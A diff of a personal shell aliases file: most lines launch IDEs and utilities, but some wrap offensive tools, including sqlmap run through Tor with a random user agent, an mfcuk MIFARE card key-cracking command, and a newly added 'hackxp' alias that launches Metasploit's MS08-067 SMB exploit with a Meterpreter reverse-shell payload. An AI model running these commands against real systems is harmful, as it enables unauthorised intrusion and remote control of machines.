|
@@ -74,9 +74,10 @@ alias necessitas="~/tools/Qt5.5.0/Tools/QtCreator/bin/qtcreator"
|
74
|
74
|
alias studio="~/tools/android-studio/bin/studio.sh"
|
75
|
75
|
alias sqlmap="~/tools/sqlmap-dev/sqlmap.py --proxy=socks5://127.0.0.1:9050 --check-tor --random-agent"
|
76
|
76
|
alias clion="~/tools/clion-latest/bin/clion.sh"
|
|
77
|
+alias idea="~/tools/idea-latest/bin/idea.sh"
|
77
|
78
|
alias phpstorm="~/tools/phpstorm-latest/bin/phpstorm.sh"
|
78
|
79
|
alias rgsd="killall gnome-settings-daemon; gnome-settings-daemon &"
|
79
|
|
-alias irc='LANG=fr xchat'
|
|
80
|
+alias irc='ssh irc'
|
80
|
81
|
alias ms4="mount /media/serv4/downloads && cd /media/serv4/downloads"
|
81
|
82
|
alias ums4="umount /media/serv4/downloads"
|
82
|
83
|
alias mfc="time mfcuk -C -s 250 -S 250 -v 4 -R"
|
|
@@ -93,3 +94,5 @@ alias update-confs="cd ~/confs && git pull -r && reload"
|
93
|
94
|
alias pycharm="~/tools/pycharm-latest/bin/pycharm.sh"
|
94
|
95
|
alias xcopy="xclip -selection clipboard"
|
95
|
96
|
alias ap="rfkill unblock wifi && sudo create_ap --config /etc/create_ap.conf"
|
|
97
|
+alias ns="sudo netstat -ntpa | grep LISTEN"
|
|
98
|
+alias hackxp="msfconsole -x 'use exploit/windows/smb/ms08_067_netapi; set payload windows/meterpreter/reverse_tcp; echo set LHOST my_ip; echo set RHOST target_ip'"
|